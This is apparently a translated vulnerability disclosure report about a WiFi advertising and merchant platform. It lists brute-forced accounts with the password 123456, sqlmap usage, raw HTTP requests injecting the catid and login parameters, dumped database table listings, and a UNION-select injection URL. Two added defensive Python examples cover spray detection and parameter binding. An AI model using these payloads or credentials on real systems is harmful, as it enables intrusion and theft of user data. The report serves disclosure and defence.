2016-05-14: Details reported to the vendor; awaiting vendor handling
2016-05-18: Vendor confirmed; details disclosed to the vendor only
2016-05-28: Details disclosed to core white hats and relevant domain experts
2016-06-07: Details disclosed to regular white hats
2016-06-17: Details disclosed to intern white hats
2016-07-02: Details disclosed to the public
As the title says.
First: **.**.**.**:10001/admin.php/Index/index.html, log in with admin / admin.
This back end only lets you edit app information; there is not much else to do here.
--------------------------------------------------------------------
Then on to http://**.**.**.**/, the merchant management back end, and tried brute forcing it.
Here every result with status 376 logs in (password 123456, many of them); status 383 is probably a valid username with the wrong password. Accounts found:
chengxin 123456
jinyue 123456
lining 123456
qingxin 123456
wangchao 123456
wangxin 123456
xiaodong 123456
xuxiaomei 123456
yanghong 123456
yun 123456
Then I logged in with the 王鑫汽车 account
and could manage the app from there.
Found a SQL injection in the back end. sqlmap syntax: sqlmap.py -r 1.txt --dbs. POST request, injected parameter catid. The injection point is in the "edit category" function:

POST /o2o/updateProductCateGrop.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/o2o/productCateGropInit.do
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522; JSESSIONID=1da7df7b-bac2-44de-9ebe-86eda561443b

catid=7316&cateGropName=1&ordernum=11

Database information:

back-end DBMS: MySQL 5.0
available databases [17]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_cloub
[*] auth_wifi
[*] auth_wifi_databak
[*] auth_wifi_toline
[*] billing_system
[*] information_schema
[*] mdlch
[*] personal_tailor
[*] pkg_platform
[*] red_packets
[*] st_mdl
[*] tenant
[*] test
[*] trade_01
Tables in the current database: 583w (5.83 million) merchant records plus 63 order records here.

Database: auth_wifi
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| st_login_log | 14110424 |
| st_day_login | 12605281 |
| auth_connections_history | 11849367 |
| st_hour_count | 10752818 |
| wifi_user_shop | 8411638 |
| wifi_user_device | 5865862 |
| wifi_user | 5836911 |
| st_day_login_8history | 3686906 |
| stat_day | 1664443 |
| agent_ad_order_time | 1118218 |
| wifi_user_online_time | 982065 |
| auth_user | 802278 |
| auth_user_group_relate | 749158 |
| app_click_log | 697793 |
| zn_app_order | 639375 |
| zn_app_pay | 443122 |
| mdl_user_score_details | 393232 |
| auth_connections_tmp | 359406 |
| users_login_log | 299028 |
| st_day_area | 258574 |
| mdl_user | 241478 |
| mdl_user_20160504 | 212262 |
| mdl_user_wxinfo | 165720 |
| zn_st_settle_accounts | 139458 |
| auth_usergroup | 139208 |
| cash_auth_shop_day | 138273 |
| wap_stat_log | 133454 |
| mdl_user_coupon | 92528 |
| nodes_201504 | 86145 |
| nodes_201505 | 84555 |
| agent_child_day | 80292 |
| stat_month | 76690 |
| nodes_201506 | 76265 |
| wap_activity_menu | 76166 |
| nodes_201502 | 74710 |
| nodes_201501 | 74646 |
| nodes_201507 | 73591 |
| zn_app_tables | 71047 |
| nodes_201508 | 69654 |
| nodes_201509 | 61986 |
| shop_online_user | 61847 |
| f_agent_category | 57046 |
| user_roles | 53314 |
| user_role_module | 52786 |
| users | 52692 |
| auth_shop | 51980 |
| nodes_201503 | 49728 |
| sms_log | 47529 |
| auth_shop_mid | 42678 |
| auth_shop_20160127 | 42549 |
| users_20151222 | 40232 |
| zn_app_client | 40159 |
| mdl_redpacket_details | 37415 |
| auth_shop_module | 36411 |
| zn_app_product | 36125 |
| auth_shop_copy | 33355 |
| ad_advertis | 30122 |
| zn_app_shop_module | 28721 |
| mdl_table_category | 26740 |
| nodes | 25450 |
| auth_hotspot_count | 23498 |
| zn_app_order_group_buy | 23083 |
| auth_hotspot | 20274 |
| zn_app_install_day | 18733 |
| nodes_201510 | 18055 |
| auth_shop_bak | 17872 |
| user_role_module_bak | 15904 |
| wap_activity_feature | 15831 |
| weixin_userinfo | 14611 |
| auth_connections | 14045 |
| zn_app_order_detail | 13708 |
| auth_shop_card_detail | 12481 |
| device_router_bak | 12006 |
| device_router | 10327 |   (1w+, i.e. over 10,000, router records here)
| zn_app_user | 10290 |
| agent_ad_order_industry | 10199 |
| zn_app_group_buy | 8195 |
| zn_app_tables_fr | 7976 |
| zn_app_group_setmeal | 7706 |
| zn_app_product_categroy | 7316 |
| cash_auth_agent_day | 7007 |
| zn_app_ad | 6688 |
| auth_black_list | 6449 |
| agent_ad_show_log | 5347 |
| auth_shop_dynamicimage | 5319 |
| mdl_code_Jurisdiction | 5098 |
| agent_ad_st_industry_day | 4337 |
| zn_app_pay_history | 4012 |
| bossclick_msg | 3986 |
| dic_base_area | 3570 |
| auth_agent_order | 3405 |
| dic_county | 3173 |
| zn_app_mobile_click | 3127 |
| agent_ad_st_time_day | 3094 |
| zn_app_group_buy_bak | 2948 |
| zn_app_fastbuy_groupbuy | 2837 |
| zn_app_shop_groupbuynum | 2706 |
| auth_bussiness_department | 2558 |
| zn_app_hot_groupbuy | 2430 |
| zn_app_topic_groupbuy | 1684 |
| zn_app_activity_feature | 1681 |
| agent_ad_order_province | 1563 |
| auth_bussiness_news | 1482 |
| zn_app_version_his | 1389 |
| agent_ad_order_hotspot | 1305 |
| zn_app_agent_categroy | 1236 |
| zn_app_shop_top | 1112 |
| auth_shop_card_awards | 1067 |
| mdl_coupon_activity | 1014 |
| auth_shop_coupon_detail | 994 |
| zn_app_coupon_set | 966 |
| auth_shop_weixin | 961 |
| zn_app_banner | 836 |
| agent_sale | 807 |
| zn_app_agent_area | 684 |
| zn_app_comment | 667 |
| zn_app_topic | 643 |
| agent_online_user | 619 |
| zn_app_favorites_groupbuy | 592 |
| mdl_shop_clerk_wx_alert | 527 |
| agent_child_hour | 516 |
| auth_agent | 516 |
| agent_ad_st_area_day | 496 |
| auth_sms_log | 486 |
| zn_app_user_address | 466 |
| mdl_agent_cate | 455 |
| cash_account | 446 |
| zn_app_favorites | 444 |
| zn_app_agent_categroy_bak | 437 |
| zn_app_agent_fastbuy | 421 |
| auth_shop_print_device | 415 |
| agent_ad_position_day | 384 |
| dic_city | 364 |
| zn_app_pay_refund | 364 |
| zn_app_msg | 362 |
| zn_app_user_coupon | 360 |
| mdl_user_score_duiba_exchange_result | 359 |
| mdl_user_score_duiba_exchange_details | 355 |
| auth_shop_coupon | 339 |
| mdl_first_preferential | 335 |
| st_month_login | 329 |
| zn_app_banner_bak | 322 |
| auth_shop_card | 321 |
| agent_ad_show | 314 |
| zn_app_favorites_product | 286 |
| device_mac_white | 263 |
| f_category | 252 |
| zn_app_category_banner | 222 |
| zn_app_version | 207 |
| auth_agent_bak | 198 |
| auth_shop_card_bak | 198 |
| zn_app_topic_bak | 189 |
| sms_recharge_log | 185 |
| hd_activities | 164 |
| dic_ad_time | 151 |
| zn_app_agent_fastbuy_bak | 145 |
| zn_app_agent_info | 137 |
| auth_agent_buydevice_copy | 133 |
| copy_of_auth_agent_buydevice | 133 |
| mdl_industry_category | 127 |
| hd_userdetail | 122 |
| agent_ad_st_day | 114 |
| f_page | 112 |
| zn_mdl_feedback | 98 |
| auth_agent_pay_cfg | 96 |
| auth_agent_buydevice | 85 |
| agent_ad_order_source | 76 |
| zn_app_category_banner_bak | 68 |
| mdl_micro_subsidy | 67 |
| ad_collect | 66 |
| mdl_micro_subsidy_20160421 | 58 |
| hd_cat | 55 |
| agent_ad_order | 53 |
| st_tmp | 50 |
| zn_app_custom_details | 43 |
| wap_nav | 42 |
| dic_province | 31 |
| temp_group | 31 |
| mdl_agent_bankaccount | 29 |
| dic_mobile | 27 |
| ad_advertis_more | 26 |
| hd_comment | 26 |
| wx_user | 22 |
| radacct | 20 |
| agent_ad_owner | 16 |
| zn_app_product_tmp | 14 |
| counter | 11 |
| p_role | 11 |
| hd_report | 10 |
| auth_agent_open_city | 9 |
| auth_agent_user | 8 |
| dic_ad_position | 8 |
| dic_network | 8 |
| radcheck | 8 |
| dic_base_info | 6 |
| dic_refund_reason | 6 |
| auth_template | 5 |
| mdl_user_buy_score_pay | 5 |
| radgroupreply | 5 |
| auth_agent_buyorder | 4 |
| dic_profit | 4 |
| user_roles_url | 4 |
| auth_group | 3 |
| dic_device | 3 |
| dic_saleteam | 3 |
| mdl_system_config | 3 |
| auth_agent_social_share_cfg | 2 |
| dic_consume_meal | 2 |
| mdl_coin_activity | 2 |
| mdl_shop_welcome | 2 |
| open_token | 2 |
| wap_banner | 2 |
| wap_cat | 2 |
| auth_shop_pay_cfg | 1 |
| cs_product | 1 |
| dic_base_info_type | 1 |
| dic_collect | 1 |
| radgroupcheck | 1 |
| radusergroup | 1 |
| wap_user | 1 |
+---------------------------------------+---------+
The other injection is in the login POST itself:

POST /ad/login.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 33
Accept: */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522

username=yangfang&password=123456

available databases [6]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_wifi
[*] information_schema
[*] test

Database: ad_wifi
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ad_show_log_bak | 5494020 |
| ad_order_time | 990274 |
| ad_st_time_day | 442304 |
| ad_visit_log | 437092 |
| ad_st_industry_day | 400526 |
| ad_st_area_day | 143023 |
| ad_order_hotspot | 119858 |
| ad_order_industry | 85127 |
| ad_st_day | 30962 |
| ad_order_saleprice | 5626 |
| ad_order_province | 4636 |
| ad_order_source | 3247 |
| ad_owner_industry | 1373 |
| ad_show | 1316 |
| ad_order | 1035 |
| ad_owner | 625 |
| dic_time | 151 |
| ad_show_log | 8 |
| dic_saleprice | 6 |
| ad_agent_set | 4 |
| ad_account | 1 |
| ad_agent_shop | 1 |
| counter | 1 |
+--------------------+---------+
http://**.**.**.**/login.ftl: then on to this system; brute forcing turned up yangfan 123456.
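Every credential finding in this report has the same shape: one source tries the same default password (admin/admin, 123456) against many accounts and gets in. The following is an added example, not code from the site or the report, showing how a defender would spot that pattern in the login log and keep such passwords out of the system in the first place. The log format, the addresses and the usernames in the sample are constructed for this example; the real application's log format is not shown on the page.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of merchant-portal login events in an assumed
# "date time source username result" format. Values are made up for this example.
SAMPLE_LOG = """\
2016-05-13 17:35:01 10.0.0.9 chengxin OK
2016-05-13 17:35:02 10.0.0.9 jinyue OK
2016-05-13 17:35:02 10.0.0.9 lining OK
2016-05-13 17:35:03 10.0.0.9 qingxin OK
2016-05-13 17:35:03 10.0.0.9 wangchao FAIL
2016-05-13 17:35:04 10.0.0.9 wangxin OK
2016-05-13 17:35:04 10.0.0.9 xiaodong OK
2016-05-13 17:35:05 10.0.0.9 nobody1 FAIL
2016-05-13 17:35:05 10.0.0.9 nobody2 FAIL
2016-05-13 18:10:00 10.0.0.42 yanghong FAIL
2016-05-13 18:10:30 10.0.0.42 yanghong OK
"""


def parse_log(text):
    """Turn the sample format into (timestamp, source, username, success) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, src, user, result = line.split()
        events.append((datetime.fromisoformat(f"{date} {time}"), src, user, result == "OK"))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Password-spray heuristic: one source touching many distinct usernames
    inside a short window. Returns {source: (distinct_users, successful_logins)}
    for the densest window of each source that crosses the threshold.

    A normal user retrying their own password (10.0.0.42 above) never trips this,
    because the distinct-username count stays at 1 however many attempts they make."""
    by_src = defaultdict(list)
    for ts, src, user, ok in events:
        by_src[src].append((ts, user, ok))

    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        lo = 0
        best = (0, 0)
        for hi in range(len(evs)):
            # Slide the window start forward until the span fits in `window`.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            span = evs[lo:hi + 1]
            users = {u for _, u, _ in span}
            successes = sum(1 for _, _, ok in span if ok)
            if len(users) > best[0]:
                best = (len(users), successes)
        if best[0] >= min_users:
            alerts[src] = best
    return alerts


# Short deny-list standing in for a real breached-password check (assumption:
# a production system would consult a much larger list).
COMMON_PASSWORDS = {"123456", "12345678", "password", "admin", "111111"}


def password_acceptable(password, min_len=10):
    """Policy that rejects the defaults seen in this report (admin/admin, 123456)
    and anything too short to resist online guessing."""
    return len(password) >= min_len and password.lower() not in COMMON_PASSWORDS


if __name__ == "__main__":
    for src, (users, successes) in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"spray from {src}: {users} usernames tried, {successes} succeeded")
    for pw in ("123456", "admin", "correct-horse-battery-9"):
        print(pw, "accepted" if password_acceptable(pw) else "rejected")
```

On the sample, the 10.0.0.9 source tries nine usernames in four seconds and succeeds on six of them, which is exactly the signature of the 123456 sweep in the report; the retrying user at 10.0.0.42 produces no alert. Thresholds are assumptions and should be tuned to the portal's real traffic.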
Found an injection point and practised manual injection: http://**.**.**.**/mdl/index_showDetail.do?pagId=-148%20%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16
The database name comes out.
Strengthen passwords; filter parameters.
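The catid injection and the pagId union query above are the same defect: a request value pasted into a SQL string, so a negative id followed by a UNION turns an integer lookup into a query the attacker chose. The fix the report asks for ("filter parameters") is type validation plus parameter binding. As an added example that is not the site's code (the real application is a Java/MySQL system; this stands in with an in-memory SQLite database and made-up table names page and app_user), here is the vulnerable lookup beside the hardened one, driven with a payload of the shape shown on the page.

```python
import sqlite3

# Constructed in-memory schema standing in for the site's detail lookup.
# Table and column names are assumptions for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE app_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO page VALUES (148, 'Welcome', 'public content')")
    conn.execute("INSERT INTO app_user VALUES (1, 'wangxin', 'hash-placeholder')")
    return conn


def show_detail_vulnerable(conn, pag_id):
    """The bug class in the report: the raw request parameter becomes part of the SQL text."""
    sql = "SELECT id, title, body FROM page WHERE id = " + pag_id
    return conn.execute(sql).fetchall()


def show_detail_fixed(conn, pag_id):
    """Hardened form: enforce the expected type, then bind the value as a parameter
    so the database never parses user input as SQL."""
    try:
        pid = int(pag_id)
    except ValueError:
        # A web handler would answer 400 here; the value is not an id at all.
        raise ValueError("pagId must be an integer")
    return conn.execute("SELECT id, title, body FROM page WHERE id = ?", (pid,)).fetchall()


# Same shape as the page's pagId=-148 union select ... : a non-matching id
# followed by a UNION that pulls rows from an unrelated table.
UNION_PAYLOAD = "-148 union select id, username, password from app_user"


def demo():
    """Run both handlers against a legitimate id and the union payload."""
    conn = make_db()
    leaked = show_detail_vulnerable(conn, UNION_PAYLOAD)
    try:
        show_detail_fixed(conn, UNION_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "legit": show_detail_fixed(conn, "148"),
        "leaked_rows": leaked,          # vulnerable handler returns the app_user row
        "payload_rejected": rejected,   # fixed handler refuses before touching the DB
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Binding alone would already defeat the union payload (the whole string is compared to the id column as a value), but the int() check is worth keeping: it rejects bad input before a query is issued and gives a precise error to log, which is also the event a WAF or application log rule would key on.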
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-05-18 13:48
CNVD has not directly reproduced the described situation and has not yet established a direct handling channel with the website's operating unit; pending claim.
None
666